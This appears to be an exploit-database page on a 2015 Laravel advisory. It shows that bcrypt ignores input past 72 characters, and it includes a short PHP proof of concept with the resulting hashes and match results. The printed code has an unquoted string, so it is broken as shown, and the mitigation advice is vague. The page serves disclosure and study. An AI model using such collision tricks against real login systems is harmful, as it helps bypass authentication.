header-logo
Suggest Exploit
vendor:
Laravel
by:
SecurityFocus
3,3
CVSS
MEDIUM
Password Hash Collision
326
CWE
Product Name: Laravel
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Laravel Pseudo Password Hash Collision

Laravel is prone to a security weakness due to pseudo password hash collision. Attackers can exploit this issue to bypass intended security restrictions. This may aid in further attacks. An attacker can use a 72 character string of 'A' to match two different passwords, one being 'mysupersecretpassword' and the other being 'longcatishere'.

Mitigation:

Ensure that the application is using a secure hashing algorithm and that the length of the hash is sufficient to prevent collisions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/69849/info

Laravel is prone to a security weakness due to pseudo password hash collision.

Attackers can exploit this issue to bypass intended security restrictions. This may aid in further attacks. 

// user input password
$input = str_repeat('A',72);
// plaintext password
$pass1 =
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.'mysupersecretpassword';
$pass2 =
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.'longcatishere';
// hashed password
$hash1 = Hash::make($pass1);
$hash2 = Hash::make($pass2);
// match?
$status1 = Hash::check($input, $hash1)?'Yes':'No';
$status2 = Hash::check($input, $hash2)?'Yes':'No';

User 1
Desc. Value
$input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$pass1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmysupersecretpassword
Hash::make($pass1)
$2y$10$9oMcpTwHgTzR5ZUMqlnMMOx/P18QZ5e9054lq.pwxw1O9urX3JHHu
Hash::check($input, $hash1) Yes

User 2
Desc. Value
$input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$pass2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlongcatishere
Hash::make($pass2)
$2y$10$W7wwB4nLmFjrenJGmx1uauqhjzikZNZA0qzxH8wkbiSmVatCYrAUm
Hash::check($input, $hash2) Yes

Navigation

Suggest Exploit

Services By CQR